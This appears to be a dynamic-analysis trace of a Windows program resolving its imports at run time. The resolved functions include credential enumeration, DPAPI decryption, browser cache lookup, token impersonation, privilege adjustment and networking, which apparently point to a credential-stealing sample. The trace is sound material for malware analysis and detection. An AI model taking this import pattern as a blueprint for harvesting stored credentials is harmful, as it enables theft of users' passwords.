	[0197.944] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.945] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleFileNameA") returned 0x76b633f6
	[0197.945] ResetEvent (hEvent=0x8) returned 1
	[0197.945] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.947] GetProcAddress (hModule=0x76b10000, lpProcName="GetStdHandle") returned 0x76b61e46
	[0197.947] ResetEvent (hEvent=0x8) returned 1
	[0197.947] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.948] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileType") returned 0x76b675a5
	[0197.948] ResetEvent (hEvent=0x8) returned 1
	[0197.948] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.950] GetProcAddress (hModule=0x76b10000, lpProcName="GetConsoleCP") returned 0x76b62c8a
	[0197.950] ResetEvent (hEvent=0x8) returned 1
	[0197.950] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.951] GetProcAddress (hModule=0x76b10000, lpProcName="GetConsoleMode") returned 0x76b62412
	[0197.951] ResetEvent (hEvent=0x8) returned 1
	[0197.951] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.953] GetProcAddress (hModule=0x76b10000, lpProcName="IsValidLocale") returned 0x76b53de4
	[0197.953] ResetEvent (hEvent=0x8) returned 1
	[0197.953] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.955] GetProcAddress (hModule=0x76b10000, lpProcName="GetUserDefaultLCID") returned 0x76b66584
	[0197.955] ResetEvent (hEvent=0x8) returned 1
	[0197.955] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.956] GetProcAddress (hModule=0x76b10000, lpProcName="EnumSystemLocalesW") returned 0x76b9f3df
	[0197.956] ResetEvent (hEvent=0x8) returned 1
	[0197.956] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.958] GetProcAddress (hModule=0x76b10000, lpProcName="GetACP") returned 0x76b639aa
	[0197.958] ResetEvent (hEvent=0x8) returned 1
	[0197.958] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.959] GetProcAddress (hModule=0x76b10000, lpProcName="SetFilePointerEx") returned 0x76b4f5b2
	[0197.959] ResetEvent (hEvent=0x8) returned 1
	[0197.959] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.961] GetProcAddress (hModule=0x76b10000, lpProcName="GetTimeZoneInformation") returned 0x76b48a3b
	[0197.961] ResetEvent (hEvent=0x8) returned 1
	[0197.961] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.962] GetProcAddress (hModule=0x76b10000, lpProcName="FindClose") returned 0x76b60e62
	[0197.962] ResetEvent (hEvent=0x8) returned 1
	[0197.962] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.964] GetProcAddress (hModule=0x76b10000, lpProcName="FindFirstFileExA") returned 0x76b9f3ef
	[0197.964] ResetEvent (hEvent=0x8) returned 1
	[0197.964] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.966] LoadLibraryW (lpLibFileName="USER32.dll") returned 0x76c00000
	[0197.977] ResetEvent (hEvent=0x8) returned 1
	[0197.977] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.979] GetProcAddress (hModule=0x76c00000, lpProcName="IsCharAlphaNumericW") returned 0x76c09a7a
	[0197.979] ResetEvent (hEvent=0x8) returned 1
	[0197.979] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.981] GetProcAddress (hModule=0x76c00000, lpProcName="wsprintfA") returned 0x76c13f47
	[0197.981] ResetEvent (hEvent=0x8) returned 1
	[0197.981] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.982] LoadLibraryW (lpLibFileName="ADVAPI32.dll") returned 0x774c0000
	[0197.983] ResetEvent (hEvent=0x8) returned 1
	[0197.983] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.984] GetProcAddress (hModule=0x774c0000, lpProcName="CryptGenRandom") returned 0x774cdfc8
	[0197.985] ResetEvent (hEvent=0x8) returned 1
	[0197.985] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.986] GetProcAddress (hModule=0x774c0000, lpProcName="GetTokenInformation") returned 0x774d431c
	[0197.986] ResetEvent (hEvent=0x8) returned 1
	[0197.986] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.988] GetProcAddress (hModule=0x774c0000, lpProcName="ConvertSidToStringSidW") returned 0x774d4344
	[0197.988] ResetEvent (hEvent=0x8) returned 1
	[0197.988] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.989] GetProcAddress (hModule=0x774c0000, lpProcName="OpenProcessToken") returned 0x774d4304
	[0197.989] ResetEvent (hEvent=0x8) returned 1
	[0197.989] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.991] GetProcAddress (hModule=0x774c0000, lpProcName="ImpersonateLoggedOnUser") returned 0x774cc57a
	[0197.991] ResetEvent (hEvent=0x8) returned 1
	[0197.991] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.992] GetProcAddress (hModule=0x774c0000, lpProcName="GetUserNameA") returned 0x774ea4b4
	[0197.992] ResetEvent (hEvent=0x8) returned 1
	[0197.992] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.993] GetProcAddress (hModule=0x774c0000, lpProcName="LookupPrivilegeValueA") returned 0x774d404a
	[0197.994] ResetEvent (hEvent=0x8) returned 1
	[0197.994] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.995] GetProcAddress (hModule=0x774c0000, lpProcName="RegDisablePredefinedCacheEx") returned 0x77503429
	[0197.995] ResetEvent (hEvent=0x8) returned 1
	[0197.995] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.996] GetProcAddress (hModule=0x774c0000, lpProcName="AdjustTokenPrivileges") returned 0x774d418e
	[0197.997] ResetEvent (hEvent=0x8) returned 1
	[0197.997] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.998] GetProcAddress (hModule=0x774c0000, lpProcName="RegEnumKeyExA") returned 0x774d1481
	[0197.998] ResetEvent (hEvent=0x8) returned 1
	[0197.998] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0197.999] GetProcAddress (hModule=0x774c0000, lpProcName="RegOpenKeyExA") returned 0x774d4907
	[0198.000] ResetEvent (hEvent=0x8) returned 1
	[0198.000] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.001] GetProcAddress (hModule=0x774c0000, lpProcName="IsTextUnicode") returned 0x774d448e
	[0198.001] ResetEvent (hEvent=0x8) returned 1
	[0198.001] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.002] GetProcAddress (hModule=0x774c0000, lpProcName="CredEnumerateA") returned 0x77507381
	[0198.002] ResetEvent (hEvent=0x8) returned 1
	[0198.003] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.004] GetProcAddress (hModule=0x774c0000, lpProcName="DuplicateToken") returned 0x774cc7e6
	[0198.004] ResetEvent (hEvent=0x8) returned 1
	[0198.004] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.005] GetProcAddress (hModule=0x774c0000, lpProcName="RegEnumKeyA") returned 0x774ea299
	[0198.005] ResetEvent (hEvent=0x8) returned 1
	[0198.005] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.007] GetProcAddress (hModule=0x774c0000, lpProcName="RegOpenKeyA") returned 0x774ccc15
	[0198.007] ResetEvent (hEvent=0x8) returned 1
	[0198.007] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.044] GetProcAddress (hModule=0x774c0000, lpProcName="RegQueryValueExA") returned 0x774d48ef
	[0198.044] ResetEvent (hEvent=0x8) returned 1
	[0198.044] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.045] GetProcAddress (hModule=0x774c0000, lpProcName="RegCloseKey") returned 0x774d469d
	[0198.045] ResetEvent (hEvent=0x8) returned 1
	[0198.046] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.047] GetProcAddress (hModule=0x774c0000, lpProcName="CryptAcquireContextW") returned 0x774cdf14
	[0198.047] ResetEvent (hEvent=0x8) returned 1
	[0198.047] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.048] GetProcAddress (hModule=0x774c0000, lpProcName="CredEnumerateW") returned 0x77507481
	[0198.048] ResetEvent (hEvent=0x8) returned 1
	[0198.048] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.050] GetProcAddress (hModule=0x774c0000, lpProcName="CredFree") returned 0x774cb2ec
	[0198.050] ResetEvent (hEvent=0x8) returned 1
	[0198.050] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.051] GetProcAddress (hModule=0x774c0000, lpProcName="CryptCreateHash") returned 0x774cdf4e
	[0198.051] ResetEvent (hEvent=0x8) returned 1
	[0198.051] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.053] GetProcAddress (hModule=0x774c0000, lpProcName="CryptHashData") returned 0x774cdf36
	[0198.053] ResetEvent (hEvent=0x8) returned 1
	[0198.053] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.054] GetProcAddress (hModule=0x774c0000, lpProcName="CryptDestroyHash") returned 0x774cdf66
	[0198.054] ResetEvent (hEvent=0x8) returned 1
	[0198.054] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.056] GetProcAddress (hModule=0x774c0000, lpProcName="RegOpenKeyExW") returned 0x774d468d
	[0198.056] ResetEvent (hEvent=0x8) returned 1
	[0198.056] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.057] GetProcAddress (hModule=0x774c0000, lpProcName="CryptGetHashParam") returned 0x774cdf7e
	[0198.057] ResetEvent (hEvent=0x8) returned 1
	[0198.057] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.059] GetProcAddress (hModule=0x774c0000, lpProcName="RegEnumValueW") returned 0x774d48cc
	[0198.059] ResetEvent (hEvent=0x8) returned 1
	[0198.059] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.060] GetProcAddress (hModule=0x774c0000, lpProcName="RegQueryValueExW") returned 0x774d46ad
	[0198.060] ResetEvent (hEvent=0x8) returned 1
	[0198.060] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.062] GetProcAddress (hModule=0x774c0000, lpProcName="CryptReleaseContext") returned 0x774ce124
	[0198.062] ResetEvent (hEvent=0x8) returned 1
	[0198.062] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.063] GetProcAddress (hModule=0x774c0000, lpProcName="RevertToSelf") returned 0x774d1562
	[0198.063] ResetEvent (hEvent=0x8) returned 1
	[0198.063] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.064] GetProcAddress (hModule=0x774c0000, lpProcName="CryptAcquireContextA") returned 0x774c91dd
	[0198.064] ResetEvent (hEvent=0x8) returned 1
	[0198.065] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.066] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x76cd0000
	[0198.068] ResetEvent (hEvent=0x8) returned 1
	[0198.068] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.069] GetProcAddress (hModule=0x76cd0000, lpProcName="CoCreateInstance") returned 0x76d19d0b
	[0198.070] ResetEvent (hEvent=0x8) returned 1
	[0198.070] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.071] GetProcAddress (hModule=0x76cd0000, lpProcName="CoUninitialize") returned 0x76d186d3
	[0198.071] ResetEvent (hEvent=0x8) returned 1
	[0198.071] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.072] GetProcAddress (hModule=0x76cd0000, lpProcName="CoInitialize") returned 0x76ceb636
	[0198.072] ResetEvent (hEvent=0x8) returned 1
	[0198.072] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.074] LoadLibraryW (lpLibFileName="USERENV.dll") returned 0x74b30000
	[0198.076] ResetEvent (hEvent=0x8) returned 1
	[0198.076] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.077] GetProcAddress (hModule=0x74b30000, lpProcName="GetProfilesDirectoryA") returned 0x74b3e291
	[0198.077] ResetEvent (hEvent=0x8) returned 1
	[0198.077] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.079] GetProcAddress (hModule=0x74b30000, lpProcName="ExpandEnvironmentStringsForUserA") returned 0x74b3e53d
	[0198.079] ResetEvent (hEvent=0x8) returned 1
	[0198.079] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.080] LoadLibraryW (lpLibFileName="SHLWAPI.dll") returned 0x771d0000
	[0198.082] ResetEvent (hEvent=0x8) returned 1
	[0198.082] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.083] GetProcAddress (hModule=0x771d0000, lpProcName="StrStrIA") returned 0x771dd250
	[0198.083] ResetEvent (hEvent=0x8) returned 1
	[0198.083] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.084] GetProcAddress (hModule=0x771d0000, lpProcName="StrCmpW") returned 0x771e8277
	[0198.084] ResetEvent (hEvent=0x8) returned 1
	[0198.084] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.122] GetProcAddress (hModule=0x771d0000, lpProcName="StrCpyNW") returned 0x7720e0e6
	[0198.122] ResetEvent (hEvent=0x8) returned 1
	[0198.122] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.123] GetProcAddress (hModule=0x771d0000, lpProcName="StrChrW") returned 0x771e4640
	[0198.123] ResetEvent (hEvent=0x8) returned 1
	[0198.123] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.125] GetProcAddress (hModule=0x771d0000, lpProcName="StrCatW") returned 0x7720e105
	[0198.125] ResetEvent (hEvent=0x8) returned 1
	[0198.125] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.126] GetProcAddress (hModule=0x771d0000, lpProcName="StrStrA") returned 0x771fc45b
	[0198.126] ResetEvent (hEvent=0x8) returned 1
	[0198.126] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.127] GetProcAddress (hModule=0x771d0000, lpProcName="wnsprintfW") returned 0x771fef87
	[0198.127] ResetEvent (hEvent=0x8) returned 1
	[0198.127] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.129] GetProcAddress (hModule=0x771d0000, lpProcName="StrChrA") returned 0x771dc5e6
	[0198.129] ResetEvent (hEvent=0x8) returned 1
	[0198.129] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.130] GetProcAddress (hModule=0x771d0000, lpProcName="wnsprintfA") returned 0x771fedae
	[0198.130] ResetEvent (hEvent=0x8) returned 1
	[0198.130] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.132] LoadLibraryW (lpLibFileName="CRYPT32.dll") returned 0x75610000
	[0198.134] ResetEvent (hEvent=0x8) returned 1
	[0198.134] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.136] GetProcAddress (hModule=0x75610000, lpProcName="CryptUnprotectData") returned 0x75645a7f
	[0198.136] ResetEvent (hEvent=0x8) returned 1
	[0198.136] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.137] LoadLibraryW (lpLibFileName="WININET.dll") returned 0x77230000
	[0198.149] ResetEvent (hEvent=0x8) returned 1
	[0198.149] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.151] GetProcAddress (hModule=0x77230000, lpProcName="FindNextUrlCacheEntryW") returned 0x7726989c
	[0198.151] ResetEvent (hEvent=0x8) returned 1
	[0198.151] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.152] GetProcAddress (hModule=0x77230000, lpProcName="FindCloseUrlCache") returned 0x77278409
	[0198.152] ResetEvent (hEvent=0x8) returned 1
	[0198.152] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.154] GetProcAddress (hModule=0x77230000, lpProcName="FindFirstUrlCacheEntryW") returned 0x7726978a
	[0198.154] ResetEvent (hEvent=0x8) returned 1
	[0198.154] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.155] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77330000
	[0198.155] ResetEvent (hEvent=0x8) returned 1
	[0198.155] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.157] GetProcAddress (hModule=0x77330000, lpProcName="memcpy") returned 0x77364cc0
	[0198.157] ResetEvent (hEvent=0x8) returned 1
	[0198.157] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.158] GetProcAddress (hModule=0x77330000, lpProcName="memcmp") returned 0x77363b1b
	[0198.158] ResetEvent (hEvent=0x8) returned 1
	[0198.158] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.159] GetProcAddress (hModule=0x77330000, lpProcName="_wcslwr") returned 0x773f9e8c
	[0198.159] ResetEvent (hEvent=0x8) returned 1
	[0198.159] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.161] GetProcAddress (hModule=0x77330000, lpProcName="memmove") returned 0x77365000
	[0198.161] ResetEvent (hEvent=0x8) returned 1
	[0198.161] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.163] GetProcAddress (hModule=0x77330000, lpProcName="memset") returned 0x77365340
	[0198.163] ResetEvent (hEvent=0x8) returned 1
	[0198.163] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.164] GetProcAddress (hModule=0x77330000, lpProcName="wcschr") returned 0x77387390
	[0198.164] ResetEvent (hEvent=0x8) returned 1
	[0198.164] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.165] GetProcAddress (hModule=0x77330000, lpProcName="strrchr") returned 0x77365900
	[0198.165] ResetEvent (hEvent=0x8) returned 1
	[0198.165] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.167] GetProcAddress (hModule=0x77330000, lpProcName="_wcsicmp") returned 0x77386f61
	[0198.167] ResetEvent (hEvent=0x8) returned 1
	[0198.167] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.168] GetProcAddress (hModule=0x77330000, lpProcName="strncpy") returned 0x77365790
	[0198.168] ResetEvent (hEvent=0x8) returned 1
	[0198.168] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.170] GetProcAddress (hModule=0x77330000, lpProcName="strstr") returned 0x773775c0
	[0198.170] ResetEvent (hEvent=0x8) returned 1
	[0198.170] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.171] GetProcAddress (hModule=0x77330000, lpProcName="strncmp") returned 0x773a25ec
	[0198.171] ResetEvent (hEvent=0x8) returned 1
	[0198.171] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.208] GetProcAddress (hModule=0x77330000, lpProcName="strchr") returned 0x77377690
	[0198.208] ResetEvent (hEvent=0x8) returned 1
	[0198.208] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.210] GetProcAddress (hModule=0x77330000, lpProcName="memchr") returned 0x77364c00
	[0198.210] ResetEvent (hEvent=0x8) returned 1
	[0198.210] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.211] GetProcAddress (hModule=0x77330000, lpProcName="strncat") returned 0x77365650
	[0198.211] ResetEvent (hEvent=0x8) returned 1
	[0198.211] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.212] LoadLibraryW (lpLibFileName="WTSAPI32.dll") returned 0x73f10000
	[0198.219] ResetEvent (hEvent=0x8) returned 1
	[0198.219] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.220] GetProcAddress (hModule=0x73f10000, lpProcName="WTSQueryUserToken") returned 0x73f11f81
	[0198.220] ResetEvent (hEvent=0x8) returned 1
	[0198.220] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.221] LoadLibraryW (lpLibFileName="SHELL32.dll") returned 0x75bb0000
	[0198.224] ResetEvent (hEvent=0x8) returned 1
	[0198.224] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.225] GetProcAddress (hModule=0x75bb0000, lpProcName="SHGetSpecialFolderPathA") returned 0x75dffb26
	[0198.225] ResetEvent (hEvent=0x8) returned 1
	[0198.225] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.227] LoadLibraryW (lpLibFileName="WS2_32.dll") returned 0x75a90000
	[0198.229] ResetEvent (hEvent=0x8) returned 1
	[0198.229] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.230] GetProcAddress (hModule=0x75a90000, lpProcName=0x10) returned 0x75a96b0e
	[0198.230] ResetEvent (hEvent=0x8) returned 1
	[0198.230] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.231] GetProcAddress (hModule=0x75a90000, lpProcName=0x6f) returned 0x75a937ad
	[0198.231] ResetEvent (hEvent=0x8) returned 1
	[0198.231] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.232] GetProcAddress (hModule=0x75a90000, lpProcName=0x13) returned 0x75a96f01
	[0198.232] ResetEvent (hEvent=0x8) returned 1
	[0198.232] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.233] GetProcAddress (hModule=0x75a90000, lpProcName=0x3) returned 0x75a93918
	[0198.234] ResetEvent (hEvent=0x8) returned 1
	[0198.234] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0198.240] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fc88 | out: lpSystemTimeAsFileTime=0x22fc88*(dwLowDateTime=0x5f70ba20, dwHighDateTime=0x1d50a6a)) 
	[0198.240] GetCurrentThreadId () returned 0x524
	[0198.240] GetCurrentProcessId () returned 0x6d8
